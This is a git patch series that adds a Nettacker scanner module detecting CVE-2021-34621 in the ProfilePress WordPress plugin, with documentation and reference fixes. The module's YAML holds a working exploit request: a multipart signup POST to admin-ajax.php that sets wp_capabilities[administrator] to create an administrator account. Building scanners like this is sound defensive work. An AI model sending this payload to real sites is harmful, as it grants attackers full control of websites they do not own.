From 7e3f8dab3008337d8e8411d0c04b441851d4a84d Mon Sep 17 00:00:00 2001 From: Manushya-a <159174280+Manushya-a@users.noreply.github.com> Date: Fri, 28 Feb 2025 22:52:13 +0530 Subject: [PATCH 1/3] Created 'wp_plugin_cve_2021_34621_vuln' --- docs/Modules.md | 1 + .../vuln/wp_plugin_cve_2021_34621.yaml | 97 +++++++++++++++++++ 2 files changed, 98 insertions(+) create mode 100644 nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml diff --git a/docs/Modules.md b/docs/Modules.md index e65ee37da..439d4f30a 100644 --- a/docs/Modules.md +++ b/docs/Modules.md @@ -160,6 +160,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke * '**ssl_weak_cipher_vuln**' - check if server's SSL configuration supports weak cipher suites * '**wordpress_dos_cve_2018_6389_vuln**' - check if Wordpress is vulnerable to CVE-2018-6389 Denial Of Service (DOS) * '**wp_xmlrpc_bruteforce_vuln**' - check if Wordpress is vulnerable to credential Brute Force via XMLRPC wp.getUsersBlogs +* '**wp_plugin_cve_2021_34621_vuln**' - check the target for CVE-2021-34621 * '**wp_xmlrpc_pingback_vuln**' - check if Wordpress is vulnerable to XMLRPC pingback * '**x_powered_by_vuln**' - check if the web server is leaking server configuration in 'X-Powered-By' response header * '**xdebug_rce_vuln**' - checks if web server is running XDebug version 2.5.5 vulnerable to RCE diff --git a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml new file mode 100644 index 000000000..4c1556ff6 --- /dev/null +++ b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml @@ -0,0 +1,97 @@ +info: + name: wp_plugin_cve_2021_34621_vuln + author: Manushya + severity: 9.8 + description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security. + references: + - https://nvd.nist.gov/vuln/detail/CVE-2024-2011 + - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621/ + profiles: + - vuln + - vulnerability + - http + - high_severity + - wordpress + - wp + - profile_press + +payloads: + - library: http + steps: + - method: post + timeout: 3 + headers: + User-Agent: "{user_agent}" + content-Type: multipart/form-data; boundary=----WebKitFormBoundary5XkgsgiDB4ZqFfxk + Accept: application/json, text/javascript, */*; q=0.01 + Accept-Encoding: gzip, deflate, br + Connection: keep-alive + X-Requested-With: XMLHttpRequest + + allow_redirects: false + ssl: false + url: + nettacker_fuzzer: + input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php/" + prefix: "" + suffix: "" + interceptors: + data: + schema: + - "http" + - "https" + ports: + - 80 + - 443 + data: | + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="reg_username" + + xyzrandom + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="reg_email" + + xyzrandom@gmail.com + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="reg_password" + + randomxyz + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="reg_password_present" + + true + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="reg_first_name" + + xyz + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="reg_last_name" + + abc + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="wp_capabilities[administrator]" + + 1 + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="signup_form_id" + + 1 + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="action" + + pp_ajax_signup + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk + Content-Disposition: form-data; name="melange_id" + + + ------WebKitFormBoundary5XkgsgiDB4ZqFfxk-- + + response: + condition_type: and + conditions: + status_code: + regex: "500" + reverse: false + content: + regex: "There has been a critical error on this website." + reverse: false From b13caddccb3efaa8e623f9d38ecb3078305f30c7 Mon Sep 17 00:00:00 2001 From: Manav Acharya <159174280+Manushya-a@users.noreply.github.com> Date: Fri, 28 Feb 2025 23:02:58 +0530 Subject: [PATCH 2/3] Update wp_plugin_cve_2021_34621.yaml Signed-off-by: Manav Acharya <159174280+Manushya-a@users.noreply.github.com> --- nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml index 4c1556ff6..27de5c862 100644 --- a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml +++ b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml @@ -1,6 +1,6 @@ info: name: wp_plugin_cve_2021_34621_vuln - author: Manushya + author: Manushya-a severity: 9.8 description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security. references: From 6414130f437d022f89345354fa316f869b4fce41 Mon Sep 17 00:00:00 2001 From: Manushya-a <159174280+Manushya-a@users.noreply.github.com> Date: Sun, 2 Mar 2025 09:15:28 +0530 Subject: [PATCH 3/3] Update wp_plugin_cve_2021_34621.yaml --- nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml index 27de5c862..d42257870 100644 --- a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml +++ b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml @@ -4,8 +4,8 @@ info: severity: 9.8 description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security. references: - - https://nvd.nist.gov/vuln/detail/CVE-2024-2011 - - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-34621 + - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621 profiles: - vuln - vulnerability @@ -13,7 +13,6 @@ info: - high_severity - wordpress - wp - - profile_press payloads: - library: http @@ -32,7 +31,7 @@ payloads: ssl: false url: nettacker_fuzzer: - input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php/" + input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php" prefix: "" suffix: "" interceptors: